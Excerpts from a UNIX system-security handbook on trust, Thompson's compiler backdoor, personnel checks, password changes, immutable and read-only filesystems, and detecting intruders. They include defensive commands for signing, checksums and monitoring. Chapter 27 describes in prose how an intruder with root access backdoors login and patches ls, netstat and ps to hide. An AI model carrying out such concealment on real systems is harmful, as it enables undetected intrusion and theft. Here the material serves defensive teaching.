algorithm, and the particular encryption implementation that you are using. Although your system manager (or someone who steals<br />

your computer) can access the encrypted file, they cannot decrypt the information stored inside that file.<br />



Chapter 27: Who Do You Trust?

Contents:<br />

Can You Trust Your Computer?

Can You Trust Your Suppliers?<br />

Can You Trust People?<br />

What All This Means<br />

Trust is the most important quality in computer security. If you build a bridge, you can look at the bridge<br />

every morning and make sure it's still standing. If you paint a house, you can sample the soil and analyze<br />

it at a laboratory to ensure that the paint isn't causing toxic runoff. But in the field of computer security,<br />

most of the tools that you have for determining the strength of your defenses and for detecting break-ins<br />

reside on your computer itself. Those tools are as mutable as the rest of your computer system.<br />

When your computer tells you that nobody has broken through your defenses, how do you know that you<br />

can trust what it is saying?<br />

27.1 Can You Trust Your Computer?

For a few minutes, try thinking like a computer criminal. A few months ago you were fired from Big<br />

Whammix, the large smokestack employer on the other side of town, and now you're working for a<br />

competing company, Bigger Bammers. Your job at Bammers is corporate espionage; you've spent the<br />

last month trying to break into Big Whammix's central mail server. Yesterday, you discovered a bug in a<br />

version of sendmail [1] that Whammix is running, and you gained superuser access.<br />

[1] This is a safe enough bet - sendmail seems to have an endless supply of bugs and design<br />

misfeatures leading to security problems.<br />

What do you do now?<br />

Your primary goal is to gain as much valuable corporate information as possible, and to do so without<br />

leaving any evidence that would allow you to be caught. But you have a secondary goal of masking your<br />

steps, so that your former employers at Whammix will never figure out that they have lost information.<br />

Realizing that the hole in the Whammix sendmail daemon might someday be plugged, you decide to<br />

create a new back door that you can use to gain access to the company's computers in the future. The<br />

easiest thing to do is to modify the computer's /bin/login program to accept hidden passwords. Therefore,<br />


you take your own copy of the source code to login.c and modify it to allow anybody to log in as root if<br />

they type a particular sequence of apparently random passwords. Then you install the program as<br />

/bin/login.

You want to hide evidence of your data collection, so you also patch the /bin/ls program. When the<br />

program is asked to list the contents of the directory in which you are storing your cracker tools and<br />

intercepted mail, it displays none of your files. You "fix" these programs so that the checksums reported<br />

by /usr/bin/sum are the same. Then, you manipulate the system clock or edit the raw disk to set all the<br />

times in the inodes back to their original values, to further cloak your modifications.<br />

You'll be connecting to the computer on a regular basis, so you also modify /usr/bin/netstat so that it<br />

doesn't display connections between the Big Whammix IP subnet and the subnet at Bigger Bammers.<br />

You may also modify the /usr/bin/ps and /usr/bin/who programs, so that they don't list users who are<br />

logged in via this special back door.<br />

Content, you now spend the next five months periodically logging into the mail server at Big Whammix<br />

and making copies of all of the email directed to the marketing staff. You do so right up to the day that<br />

you leave your job at Bigger Bammers and move on to a new position at another firm. On your last day,<br />

you run a shell script that you have personally prepared that restores all of the programs on the hard disk<br />

to their original configuration. Then, as a parting gesture, your program introduces subtle modifications<br />

into the Big Whammix main accounting database.<br />

Technological fiction? Hardly. By the middle of the 1990s, attacks against computers in which the<br />

system binaries were modified to prevent detection of the intruder had become commonplace. After<br />

sophisticated attackers gain superuser access, the common way that you discover their presence is if they<br />

make a mistake.<br />

27.1.1 Harry's Compiler<br />

In the early days of the MIT Media Lab, there was a graduate student who was very unpopular with the<br />

other students in his lab. To protect his privacy, we'll call the unpopular student "Harry."<br />

Harry was obnoxious and abrasive, and he wasn't a very good programmer either. So the other students<br />

in the lab decided to play a trick on him. They modified the PL/1 compiler on the computer that they all<br />

shared so that the program would determine the name of the person who was running it. If the person<br />

running the compiler was Harry, the program would run as usual, reporting syntax errors and the like, but<br />

it would occasionally, randomly, not produce a final output file.<br />

This mischievous prank caused a myriad of troubles for Harry. He would make a minor change to his<br />

program, run it, and - occasionally - the program would run the same way as it did before he made his<br />

modification. He would fix bugs, but the bugs would still remain. But then, whenever he went for help,<br />

one of the other students in the lab would sit down at the terminal, log in, and everything would work<br />

properly.<br />

Poor Harry. It was a cruel trick. Somehow, though, everybody forgot to tell him about it. He soon grew<br />

frustrated with the whole enterprise, and eventually left school.<br />

And you thought those random "bugs" in your system were there by accident?<br />


27.1.2 Trusting Trust<br />

Perhaps the definitive account of the problems inherent in computer security and trust is related in Ken<br />

Thompson's article, "Reflections on Trusting Trust." [2] Thompson describes a back door planted in an<br />

early research version of <strong>UNIX</strong>.<br />

[2] Communications of the ACM, Volume 27, Number 8, August 1984.<br />

The back door was a modification to the /bin/login program that would allow him to gain superuser<br />

access to the system at any time, even if his account had been deleted, by providing a predetermined<br />

username and password. While such a modification is easy to make, it's also an easy one to detect by<br />

looking at the computer's source code. So Thompson modified the computer's C compiler to detect if it<br />

was compiling the login.c program. If so, then the additional code for the back door would automatically<br />

be inserted into the object-code stream, even though the code was not present in the original C source<br />

file.<br />

Thompson could now have the login.c program inspected by his coworkers, compile the program, install<br />

the /bin/login executable, and yet be assured that the back door was firmly in place.<br />

But what if somebody inspected the source code for the C compiler itself? Thompson thought of that<br />

case as well. He further modified the C compiler so that it would detect whether it was compiling the<br />

source code for itself. If so, the compiler would automatically insert the special program recognition<br />

code. After one more round of compilation, Thompson was able to put all the original source code back<br />

in place.<br />

Thompson's experiment was like a magic trick. There was no back door in the login.c source file and no<br />

back door in the source code for the C compiler, and yet there was a back door in both the final compiler<br />

and in the login program. Abracadabra!<br />

What hidden actions do your compiler and login programs perform?<br />

27.1.3 What the Superuser Can and Cannot Do<br />

As all of these examples illustrate, technical expertise combined with superuser privileges on a computer<br />

is a powerful combination. Together, they let an attacker change the very nature of the computer's<br />

operating system. An attacker can modify the system to create "hidden" directories that don't show up<br />

under normal circumstances (if at all). Attackers can change the system clock, making it look as if the<br />

files that they modify today were actually modified months ago. An attacker can forge electronic mail.<br />

(Actually, anybody can forge electronic mail, but an attacker can do a better job of it.)<br />

Of course, there are some things that an attacker cannot do, even if that attacker is a technical genius and<br />

has full access to your computer and its source code. An attacker cannot, for example, decrypt a message<br />

that has been encrypted with a perfect encryption algorithm. But he can alter the code to record the key<br />

the next time you type it. An attacker probably can't program your computer to perform mathematical<br />

calculations a dozen times faster than it currently does, although there are few security implications to<br />

doing so. Most attackers can't read the contents of a file after it's been written over with another file<br />

unless they take apart your computer and take the hard disk to a laboratory. However, an attacker with<br />

privileges can alter your system so that files you have deleted are still accessible (to him).<br />


In each case, how do you tell if the attack has occurred?<br />

The "what-if" scenario can be taken to considerable lengths. Consider an attacker who is attempting to<br />

hide a modification in a computer's /bin/login program:<br />

Table 27.1: The "What-If" Scenario<br />

What the Attacker Might Do After Gaining Your Responses<br />

Root Access<br />

The attacker plants a back door in the /bin/login You use PGP to create a digital signature of all<br />

program to allow unauthorized access.<br />

system programs. You check the signatures every<br />

day.<br />

The attacker modifies the version of PGP that you You copy /bin/login onto another computer before<br />

are using, so that it will report that the signature on verifying it with a trusted copy of PGP.<br />

/bin/login verifies, even if it doesn't.<br />

The attacker modifies your computer's kernel by You put a copy of PGP on a removable hard disk.<br />

adding loadable modules, so that when the You mount the hard disk to perform the signature<br />

/bin/login is sent through a TCP connection, the verification and then unmount it. Furthermore, you<br />

original /bin/login, rather than the modified version, put a good copy of /bin/login onto your removable<br />

is sent.<br />

hard disk and then copy the good program over the<br />

installed version on a regular basis.<br />

The attacker regains control of your system and You reinstall the entire system software, and<br />

further modifies the kernel so that the modification configure the system to boot from a read-only<br />

to /bin/login is patched into the running program device such as a CD-ROM.<br />

after it loads. Any attempt to read the contents of<br />

the /bin/login file results in the original, unmodified<br />

version.<br />

Because the system now boots from a CD-ROM, Your move . . .<br />

you cannot easily update system software as bugs<br />

are discovered. The attacker waits for a bug to crop<br />

up in one of your installed programs, such as<br />

sendmail. When the bug is reported, the attacker<br />

will be ready to pounce.<br />

(See Table 27.1.)<br />
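As a concrete illustration of the first response in the table, here is a rough sketch using GnuPG, a freely available OpenPGP implementation standing in for the PGP program the table assumes; the signature directory is an invented name for the example:

    # Sign critical binaries once, storing detached signatures off the system
    # (ideally on removable, read-only media).
    gpg --detach-sign --output /secure/sigs/login.sig /bin/login

    # Each day, verify the installed binary against the stored signature;
    # a failed verification means the file has changed.
    gpg --verify /secure/sigs/login.sig /bin/login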

If you think that this description sounds like a game of chess, you're correct. <strong>Practical</strong> computer security<br />

is a series of actions and counteractions, of attacks and defenses. As with chess, success depends upon<br />

anticipating your opponent's moves and planning countermeasures ahead of time. Simply reacting to your<br />

opponent's moves is a recipe for failure.<br />

The key thing to note, however, is that somewhere, at some level, you need to trust what you are working<br />

with. Maybe you trust the hardware. Maybe you trust the CD-ROM. But at some level, you need to trust<br />

what you have on hand. Perfect security isn't possible, so we need to settle for the next best thing -<br />

reasonable trust on which to build.<br />

The question is, where do you place that trust?<br />




Chapter 13: Personnel Security

Contents:<br />

Background Checks<br />

On the Job<br />

Outsiders<br />

Consider a few recent incidents that made the news:<br />

● Nick Leeson, an investment trader at the Barings Bank office in Singapore, and Toshihide Iguchi of the Daiwa Bank office in New York City each made risky investments and lost substantial amounts of their bank's funds. Rather than admit to the losses, each of them altered computer records and effectively gambled more money to recoup the losses. Eventually, both were discovered after each bank lost more than one billion dollars. As a result, Barings was forced into insolvency, and Daiwa may not be allowed to operate in the United States in the future.

● In the U.S., personnel with the CIA and armed forces with high-security clearances (Aldrich Ames, Jonathan Pollard, and Robert Walker) were discovered to have been passing classified information to Russia and to Israel. Despite several special controls for security, these individuals were able to commit damaging acts of espionage.

If you examine these cases and the vast number of computer security violations committed over the past<br />

few decades, you will find one common characteristic: 100% of them were caused by people. Break-ins<br />

were caused by people. Computer viruses were written by people. Passwords were stolen by people.<br />

Without people, we wouldn't have computer security problems! However, we continue to have people<br />

involved with computers, so we need to be concerned with personnel security.<br />

"Personnel security" is everything involving employees: hiring them, training them, monitoring their<br />

behavior, and sometimes, handling their departure. Statistics show that the most common perpetrators of<br />

significant computer crime are those people who have legitimate access now, or who have recently had<br />

access; some studies show that over 80% of incidents are caused by these individuals. Thus, managing<br />

personnel with privileged access is an important part of a good security plan.<br />

People are involved in computer security problems in two ways. Some people unwittingly aid in the<br />

commission of security incidents by failing to follow proper procedure, by forgetting security<br />

considerations, and by not understanding what they are doing. Other people knowingly violate controls<br />

and procedures to cause or aid an incident. As we have noted earlier, the people who knowingly<br />


contribute to your security problems are most often your own users (or recent users): they are the ones<br />

who know the controls, and know what information of value may be present.<br />

You are likely to encounter both kinds of individuals in the course of administering a <strong>UNIX</strong> system. The<br />

controls and mechanisms involved in personnel security are many and varied. Discussions of all of them<br />

could fill an entire book, so we'll simply summarize some of the major considerations.<br />

13.1 Background Checks<br />

When you hire new employees, check their backgrounds. You may have candidates fill out application<br />

forms, but then what do you do? At the least, you should check all references given by each applicant to<br />

determine his past record, including reasons why he left those positions. Be certain to verify the dates of<br />

employment, and check any gaps in the record. One story we heard involved an applicant who had an<br />

eight-year gap in his record entitled "independent consulting." Further research revealed that this<br />

"consulting" was being conducted from inside a Federal prison cell - something the applicant had failed<br />

to disclose, no doubt because it was the result of a conviction for computer-based fraud.<br />

You should also verify any claims of educational achievement and certification: stories abound of<br />

individuals who have claimed to have earned graduate degrees from prestigious universities - universities<br />

that have no records of those individuals ever completing a class. Other cases involve degrees from<br />

"universities" that are little more than a post office box.<br />

Consider that an applicant who lies to get a job with you is not establishing a good foundation for future<br />

trust.<br />

In some instances you may want to make more intensive investigations of the character and background<br />

of the candidates. You may want to:<br />

● Have an investigation agency do a background check.

● Get a criminal record check of the individual.

● Check the applicant's credit record for evidence of large personal debt and the inability to pay it. Discuss problems, if you find them, with the applicant. People who are in debt should not be denied jobs: if they are, they will never be able to regain solvency. At the same time, employees who are under financial strain may be more likely to act improperly.

● Conduct a polygraph examination of the applicant (if legal).

● Ask the applicant to obtain bonding for his position.

In general, we don't recommend these steps for hiring every employee. However, you should conduct<br />

extra checks of any employee who will be in a position of trust or privileged access - including<br />

maintenance and cleaning personnel.<br />

We also suggest that you inform the applicant that you are performing these checks, and obtain his or her<br />

consent. This courtesy will make the checks easier to perform and will put the applicant on notice that<br />

you are serious about your precautions.<br />




Chapter 3: Users and Passwords

3.4 Changing Your Password

You can change your password with the <strong>UNIX</strong> passwd command. passwd first asks you to type your old<br />

password, then asks for a new one. By asking you to type your old password first, passwd prevents<br />

somebody from walking up to a terminal that you left yourself logged into and then changing your<br />

password without your knowledge.<br />

<strong>UNIX</strong> makes you type the password twice when you change it:<br />

% passwd<br />

Changing password for sarah.<br />

Old password:tuna4fis<br />

New password: nosmis32<br />

Retype new password: nosmis32<br />

%<br />

If the two passwords you type don't match, your password remains unchanged. This is a safety<br />

precaution: if you made a mistake typing the new password and <strong>UNIX</strong> only asked you once, then your<br />

password could be changed to some new value and you would have no way of knowing that value.<br />

NOTE: On systems that use Sun Microsystems' NIS or NIS+, you may need to use the command yppasswd or nispasswd to change your password. Except for having different names, these commands work the same way as passwd. However, when they run, they update your password in the NIS or NIS+ network database. With NIS+, your password will be immediately available on other clients on the network; with NIS, your password will be distributed during the next regular update.

Even though passwords are not echoed when they are printed, the BACKSPACE or DELETE key (or<br />

whatever key you have bound to the "erase" function) will still delete the last character typed, so if you<br />

make a mistake, you can correct it.<br />

After you have changed your password, your old password is no good. Do not forget your new password!<br />

If you forget your new password, you will need to have the system administrator set it to something you<br />

can use to log in and try again.<br />

If your system administrator gives you a new password, immediately change it to something else that<br />

only you know! Otherwise, if your system administrator is in the habit of setting the same password for<br />

forgetful users, your account may be compromised by someone else who has had a temporary lapse of<br />

memory; see the following sidebar for an example.<br />


NOTE: If you get email from your system manager, advising you that there are system<br />

problems and that you should immediately change your password to "tunafish" (or some<br />

other value), disregard the message and report it to your system management. These kinds<br />

of email messages are frequently sent by computer crackers to novice users. The hope is that<br />

the novice user will comply with the request and change his password to the one that is<br />

suggested - often with devastating results.<br />



Chapter 9: Integrity Management

Contents:<br />

Prevention<br />

Detecting Change<br />

A Final Note<br />

As we noted in Chapter 2, Policies and Guidelines, there are several different aspects to computer<br />

security. Integrity is, in most environments, the most important aspect of computer security.<br />

Paradoxically, integrity is also the aspect of security that has been given low priority by practitioners

over the years. This is so, in large part, because integrity is not the central concern of military security -<br />

the driving force behind most computer security research and commercial development over the past few<br />

decades. In the military model of security, we want to prevent unauthorized personnel from reading any<br />

sensitive data. We also want to prevent anyone from reading data that may not be sensitive, but that can<br />

be combined with other data to compromise information. This is called confidentiality and is of<br />

paramount importance in the military view of computer security.<br />

Confidentiality is a weird priority. It leads us to security policies in which it is acceptable, at some level,<br />

to blow up the computer center, burn the backup tapes, and kill all the users - provided that the data files<br />

are not read by the attacker!<br />

In most commercial and research environments, integrity is more important than confidentiality. If<br />

integrity were not the priority, the following scenarios might actually seem reasonable:<br />

"Well, whoever came in over the net wiped out all of /usr and /etc, but they weren't able to<br />

read any of the files in /tmp. I guess our security worked!"<br />

-or-<br />

"Somebody compromised the root account and added 15 new users to /etc/passwd, but our<br />

security system kept them from doing an ls of the /usr/spool/mail directory. We dodged a<br />

bullet on this one!" -or-<br />

"As near as we can tell, one of the people we fired last week planted a virus in the system<br />

that has added itself to every system binary, and the virus is causing the system to crash<br />

every 15 minutes. We don't have a security problem, though, because we have shut off the<br />

network connection to the outside, so nobody will know about it."<br />


These examples are obviously silly in most settings. We do care about integrity: protecting our data from<br />

unauthorized modification or deletion. In many commercial environments, both confidentiality and<br />

integrity are important, but integrity is more important. Most banks, for example, desire to keep the<br />

account balances of their depositors both secret and correct. But, given a choice between having balances<br />

revealed and having them altered, the first is preferable to the second. Integrity is more important than<br />

confidentiality.<br />

In a typical <strong>UNIX</strong> system, protecting the integrity of system and user data can be a major challenge.<br />

There are many ways to alter and remove data, and often as little as a single bit change (like a protection<br />

bit or owner UID) can result in the opportunity to make more widespread changes.<br />

But ensuring integrity is difficult. Consider some of the ways that an unauthorized user could change or<br />

delete the file /usr/spaf/notes owned by user spaf:<br />

● Permissions on notes allow modification by other users.

● Someone is able to compromise the login password of user spaf.

● Someone is able to compromise user root.

● setuid programs to root or to spaf allow the file to be altered.

● Permissions on one of the directories /, /usr, or /usr/spaf allow the file to be deleted.

● Permissions can also allow the file /usr/spaf/notes to be moved and a new file created in its place. The new file would have ownership and permissions based on who created it. In a sense, the original file would not have been deleted, but only renamed.

● Permissions for the group "owner" of the file or one of the containing directories allow another user to modify it.

● /etc/passwd can be altered by an unauthorized user, allowing someone to become root or user spaf.

● The block device representing the disk containing the file can be written to by an unprivileged user.

● The raw device representing the disk containing the file can be written to by an unprivileged user.

● The directory is exported using some network filesystem that can be compromised and written to by an external host.

● Buggy software allows the file to be altered by an unauthorized user.

● Permissions on a system binary allow an unauthorized individual to plant a Trojan Horse or virus that modifies the file.

And that is a partial list!<br />

The goal of good integrity management is to prevent alterations to (or deletions of) data, to detect<br />

modifications or deletions if they occur, and to recover from alterations or deletions if they happen. In<br />

the next few sections, we'll present methods of attaining these goals.<br />
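As a small taste of the detection methods discussed later, here is a minimal sketch of a checksum baseline built with the standard cksum utility. The baseline filename and the choice of directories are assumptions for the example, and a real deployment would keep the baseline somewhere an intruder cannot rewrite it:

    # Record checksums and sizes of system binaries and configuration files.
    find /bin /usr/bin /etc -type f -exec cksum {} \; > /secure/baseline.new

    # Compare against the previously stored baseline; any differing line
    # is a file that has been added, removed, or modified since then.
    diff /secure/baseline /secure/baseline.new

    # If the differences are all legitimate, promote the new baseline.
    mv /secure/baseline.new /secure/baseline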


9.1 Prevention

Whenever possible, we would like to prevent unauthorized alteration or deletion of data on our systems. We can do so via software controls and some hardware means. We have discussed many of the software methods available on UNIX systems in other chapters. These have included setting appropriate permissions on files and directories, restricting access to the root account, and controlling access to remote services.

Unfortunately, no matter how vigilant we may be, bugs occur in software (more often than they should!), and configuration errors are made.[1] In such cases, we desire that data be protected by something at a lower level - something in which we might have more confidence.

[1] In a presentation by Professor Matt Bishop of UC Davis, he concluded that as many as 95% of the reported UNIX security incidents that he studied might be the result of misconfiguration!

9.1.1 Immutable and Append-Only Files

Two new mechanisms were built into the BSD 4.4 version of UNIX: immutable and append-only files. These wonderful mechanisms are present only (at the time of this writing, to the best of our knowledge) in the FreeBSD, NetBSD, and BSDI versions of UNIX. The fact that more commercial vendors have not seen fit to integrate this idea into their products is a pity.

As their names imply, immutable files are files that cannot be modified once the computer is running. They are ideally suited to system configuration files, such as /etc/rc and /etc/inetd.conf. Append-only files are files to which data can be appended, but in which existing data cannot be changed. They are ideally suited to log files.

To implement these new file types, BSD 4.4 introduced a new concept called the kernel security level. Briefly, the kernel security level defines four levels of security. Any process running as superuser can raise the security level, but only the init process (process number 1) can lower it. The four security levels are shown in Table 9.1.

Table 9.1: BSD 4.4 Security Levels

Security Level   Mode                   Meaning
-1               Permanently insecure   Normal UNIX behavior.
 0               Insecure mode          Immutable and append-only flags can be changed.
 1               Secure mode            The immutable and append-only flags cannot be changed. UNIX devices that correspond to mounted filesystems, as well as the /dev/mem and /dev/kmem devices, are read-only.
 2               Highly secure mode     A superset of the secure mode. All disk devices are read-only, whether or not they correspond to mounted filesystems. This prevents an attacker from unmounting a filesystem to modify the raw bits on the device, but it also prevents you from creating new filesystems with the newfs command while the system is operational.

The 4.4 BSD filesystem does not allow any changes to files that are immutable or append-only. Thus, even if an attacker obtains superuser access, he cannot modify these files. Furthermore, the system prevents "on-the-fly" patching of the operating system by disallowing writes to the /dev/mem or /dev/kmem devices. Properly configured, these innovations can dramatically improve a system's resistance to a determined attacker.

Of course, immutable files can be overcome by an attacker who has physical access to the computer: the attacker could simply reboot the computer in single-user mode, before the system switches into secure mode. However, if someone has physical access, that person could just as easily remove the disk and modify it on another computer system. In most environments, physical access can be restricted somewhat. If an attacker at a remote site shuts down the system, thus enabling writing of the partition, that attacker also shuts down any connection he would use to modify that partition.

Although these new filesystem structures are a great idea, it is still possible to modify data within immutable files if care is not taken. For instance, an attacker might compromise root and alter some of the programs used by the system during start-up. Thus, many files need to be protected with immutability if the system is to be used effectively.
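
To make this concrete, here is a minimal sketch of how these protections are typically applied on FreeBSD-style systems; the flag names (schg, sappnd), the -o option to ls, and the kern.securelevel sysctl variable are specific to those systems and may differ or be absent elsewhere:

# chflags schg /etc/rc              # mark a startup script system-immutable
# chflags sappnd /var/log/messages  # allow data to be appended to a log file, but never changed
# ls -lo /etc/rc                    # -o displays the file flags along with the permissions
# sysctl kern.securelevel           # check the current kernel security level

Once the security level has been raised above 0, even the superuser cannot clear these flags; the system must first be brought back down to single-user mode.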

9.1.2 Read-only Filesystems

A somewhat stronger preventive mechanism is to use hardware read-only protection of the data. Doing so requires setting a physical write-protect switch on a disk drive or mounting the data from a CD-ROM. The material is then mounted using the software read-only option of the mount command. The best crackers in the business can't come across the network and write to a read-only CD-ROM!

NOTE: The read-only option to the mount command does not protect data! Disks mounted with the read-only option can still be written to using the raw device interface to the disk - the option only protects access to the files via the block device interface. Furthermore, an attacker who has gained the appropriate privileges (e.g., root) can always remount the disk read/write.

The read-only option to the mount command exists largely for when a physically protected disk is mounted read-only; without the option, UNIX would attempt to modify the "last access" times of files and directories as they were read, which would lead to many error messages.

If it is possible to structure the system to place all the commands, system libraries, system databases, and important directories on read-only media, the system can be made considerably safer. To modify one of these files, an unauthorized user would require physical access to the disk drive to reset the switch, and sufficient access to the system (physical access or operator privileges) to remount the partition. In many cases, this access can be severely restricted. Unmounting and remounting a disk would likely be noticed, too!
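
For example (a sketch only; the device name and mount point are illustrative and vary from system to system), a write-protected partition holding system binaries might be mounted like this:

# mount -r /dev/sd0a /usr    # -r (equivalent to "-o ro" on many systems) requests a read-only mount
# mount                      # with no arguments, lists mounted filesystems so you can confirm the read-only status

Attempts to create or modify files under /usr will then fail with "Read-only file system" errors, and the physical write-protect switch keeps even the raw device from being written.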

In those cases in which the owner needs to modify software or install updates, it should be a simple matter to shut down the system in an orderly manner and then make the necessary changes. As an added benefit, the additional effort required to make changes in a multiuser system might help deter spur-of-the-moment changes, or the installation of software that is too experimental in nature. (Of course, this whole mechanism would not be very helpful to a dedicated Linux hacker who may be making daily changes. As with any approach, it isn't for everyone.)

Organizing a system to use read-only disks requires assistance from the vendor of the system. The vendor needs to structure the system so that the few system files that need to be modified on a frequent basis are located on a different partition from the system files that are to be protected. These special files include log files, /etc/motd, utmp, and other files that might need to be altered as part of regular operation (including, perhaps, /etc/passwd if your users change passwords or shells frequently). Most modern systems have symbolic links that can be used for this purpose. In fact, systems that support diskless workstations are often already configured in this manner: volatile files are symbolically linked to a location on a /var partition. This link allows the binaries to be mounted read-only from the server and shared by many clients.
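
As a minimal illustration (the particular file and the destination under /var are only examples), a volatile file on an otherwise read-only root partition can be relocated and replaced with a symbolic link:

# mv /etc/motd /var/adm/motd       # move the writable copy onto the read/write /var partition
# ln -s /var/adm/motd /etc/motd    # leave a symbolic link behind so programs still find it in the usual place

After the move, /etc can live on read-only media while the file itself remains changeable.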

There are some additional benefits to using read-only storage for system files. Besides the control over modification (friendly and otherwise) already noted, consider the following:

● You only need to do backups of the read-only partitions once after each change - there is no need to waste time or tapes performing daily or weekly backups.
● In a large organization, you can put a "standard" set of binaries up on a network file server - or cut a "standard" CD-ROM to be used by all the systems - making configuration management and portability much simpler.
● There is no need to set disk quotas on these partitions, as the contents will not grow except in well-understood (and monitored) ways.
● There is no need to run periodic file clean or scan operations on these disks, as the contents will not change.

There are some drawbacks and limitations to read-only media, however:

● This media is difficult to employ for user data protection. Usually, user data is too volatile for read-only media. Furthermore, it would require that the system administrator shut down the system each time a user wanted to make a change. This requirement would not work well in a multiuser environment.
● Few vendors supply disks capable of operating in this mode as a matter of course. Most disks in workstations are internal, and do not have a write-protect switch.
● It requires that an entire disk be made read-only.[2] There may be a large amount of wasted space on the disk.
  [2] Some disks allow only a range of sectors to be protected, but these are not the norm.
● This media requires at least two physical disks per machine (unless you import network partitions) - the read-only disk for system files, and a disk for user files.
● If you are operating from a CD-ROM disk, these may have slower access times than a standard internal read/write disk.


Chapter 24
Discovering a Break-in

24.2 Discovering an Intruder

There are several ways you might discover a break-in:

● Catching the perpetrator in the act. For example, you might see the superuser logged in from a dial-up terminal when you are the only person who should know the superuser password.
● Deducing that a break-in has taken place based on changes that have been made to the system. For example, you might receive an electronic mail message from an attacker taunting you about a security hole, or you may discover new account entries in your /etc/passwd file.
● Receiving a message from a system administrator at another site indicating strange activity at his or her site that has originated from an account on your machine.
● Strange activities on the system, such as system crashes, significant hard disk activity, unexplained reboots, minor accounting discrepancies,[1] or sluggish response when it is not expected (Crack may be running on the system).

[1] See Cliff Stoll's The Cuckoo's Egg for the tale of how such a discrepancy led to his discovery of a hacker's activities.

There are a variety of commands that you can use to discover a break-in, and some excellent packages, such as Tiger and Tripwire, described elsewhere in this book. Issue these commands on a regular basis, but execute them sporadically as well. This introduces an element of randomness that makes it harder for perpetrators to anticipate your checks and cover their tracks. This principle is a standard of operations security: try to be unpredictable.
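
One way to add that unpredictability (a sketch only; the particular checks and the Tripwire path are illustrative, and assume the package has been installed locally) is to run your routine checks from a script that waits a random amount of time before starting:

#!/bin/sh
# Run routine monitoring and integrity checks after an unpredictable delay.
sleep `expr $$ % 3600`       # crude pseudo-random delay of up to an hour, derived from the process ID
w                            # who is logged in and what they are doing
ps -ef                       # all processes ("ps -aux" on BSD-derived systems)
netstat -a                   # current network connections
/usr/local/bin/tripwire      # compare the filesystem against the Tripwire database (path illustrative)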

24.2.1 Catching One in the Act

The easiest way to catch an intruder is by looking for events that are out of the ordinary. For example:

● A user who is logged in more than once. (Many window systems register a separate login for each window that is opened by a user, but it is usually considered odd for the same user to be logged in on two separate dial-in lines at the same time.)
● A user who is not a programmer but who is nevertheless running a compiler or debugger.
● A user who is making heavy and uncharacteristic use of the network.
● A user who is initiating many dialout calls.
● A user who does not own a modem logged into the computer over a dial-in line.
● A person who is executing commands as the superuser.
● Network connections from previously unknown machines, or from sites that shouldn't be contacting yours for any reason.
● A user who is logged in while on vacation or outside of normal working hours (e.g., a secretary dialed in by phone at 1:00 a.m. or a computer science graduate student working at 9:00 a.m.).

UNIX provides a number of commands to help you figure out who is doing what on your system. The finger, users, whodo, w, and who commands all display lists of the users who are currently logged in. The ps and w commands help you determine what any user is doing at any given time; ps displays a more comprehensive report, and w displays an easy-to-read summary. The netstat command can be used to check on current network connections and activity.

If you are a system administrator, you should be in the habit of issuing these commands frequently to monitor user activity. After a while, you will begin to associate certain users with certain commands. Then, when something out of the ordinary happens, you will have cause to take a closer look.

Be aware, however, that all of these commands can be "fooled" by computer intruders with sufficient expertise. For example, w, users, and finger all check the /etc/utmp file to determine who is currently logged in to the computer. If an intruder erases or changes his entry in this file, these commands will not report the intruder's presence. Also, some systems fail to update this file, and some window systems do not properly update it with new entries, so even when the file is protected, it may not have accurate information.

As the ps command actually examines the kernel's process table, it is more resistant to subversion than the commands that examine the /etc/utmp file. However, an intruder who has also attained superuser access on your system can modify the ps command or the code in the system calls it uses so that it won't print his or her processes. Furthermore, any process can modify its argv arguments, allowing it to display whatever it wishes in the output of the ps command. If you don't believe what these commands are printing, you might be right!
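
As a rough cross-check (a sketch only; the temporary filenames are arbitrary, and ps -ef is the System V form - use ps -aux on BSD-derived systems), you can compare the users reported by who against the owners of running processes; an account that owns processes but has no login entry deserves a closer look:

% who | awk '{print $1}' | sort -u > /tmp/who.users
% ps -ef | awk 'NR > 1 {print $1}' | sort -u > /tmp/ps.users
% diff /tmp/who.users /tmp/ps.users    # names appearing only in the second file have processes but no utmp entry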

24.2.2 What to Do When You Catch Somebody

You have a number of choices when you discover an intruder on your system:

1. Ignore them.
2. Try to contact them with write or talk, and ask them what they want.
3. Try to trace the connection and identify the intruder.
4. Break their connection by killing their processes, unplugging the modem or network, or turning off your computer.
5. Contact a FIRST (Forum of Incident Response and Security Teams) team (e.g., the CERT-CC[2]) to notify them of the attack.

[2] See Appendix F, Organizations, for a complete list of FIRST teams.

What you do is your choice. If you are most inclined towards option #1, you probably should reread Chapter 1, Introduction, and Chapter 2, Policies and Guidelines. Ignoring an intruder who is on your system essentially gives him or her free rein to do harm to you, your users, or others on the network.

If you choose option #2, keep a log of everything the intruder sends back to you, then decide whether to pursue one of the other options. Options #3 and #4 are discussed in the sections "Tracing a Connection" and "Getting Rid of the Intruder" that follow.

NOTE: Some intruders are either malicious in intent, or extremely paranoid about being caught. If you contact them, they may react by trying to delete everything on disk so as to hide their activities. If you try to contact an intruder who turns out to be one of these types, be certain you have a set of extremely current backups!

If the intruder is logged into your computer over the network, you may wish to trace the connection first, because it is usually much easier to trace an active network connection than one that has been disconnected.

After the trace, you may wish to try to communicate with the intruder using the write or talk programs. If the intruder is connected to your computer by a physical terminal, you may wish to walk over to that terminal and confront the person directly (then again, you might not!).

NOTE: Avoid using mail or talk to contact the remote site if you are trying to trace the connection without tipping off the intruder, because the root account on the remote site may be compromised. Try to use the telephone, if at all possible, before sending email. If you must send a message, send something innocuous, such as "could you please give me a call: we are having problems with your mailer." Of course, if somebody calls you, verify who they are.

24.2.3 Monitoring the Intruder

You may wish to monitor the intruder's actions to figure out what he is doing. This will give you an idea of whether he is modifying your accounting database, or simply rummaging around through your users' email.

There are a variety of means that you can use for monitoring the intruder's actions. The simplest way is to use programs such as ps or lastcomm to see which processes the intruder is using.

Depending on your operating system, you may be able to monitor the intruder's keystrokes using programs such as ttywatch or snoop. These commands can give you a detailed, packet-by-packet account of information sent over a network. They can also give you a detailed view of what an intruder is doing. For example:

# snoop
asy8.vineyard.net -> next              SMTP C port=1974
asy8.vineyard.net -> next              SMTP C port=1974 MAIL FROM:
             next -> asy8.vineyard.net SMTP R port=1974 250
asy8.vineyard.net -> next              SMTP C port=1974 RCPT TO:
             next -> asy8.vineyard.net SMTP R port=1974 250
asy8.vineyard.net -> next              SMTP C port=1974 DATA\r\n
             next -> asy8.vineyard.net SMTP R port=1974 354 Enter mail, end

In this case, an email message was intercepted as it was sent from asy8.vineyard.net to the computer next. As the above example shows, these utilities will give you a detailed view of what people on your system are doing, and they have a great potential for abuse.

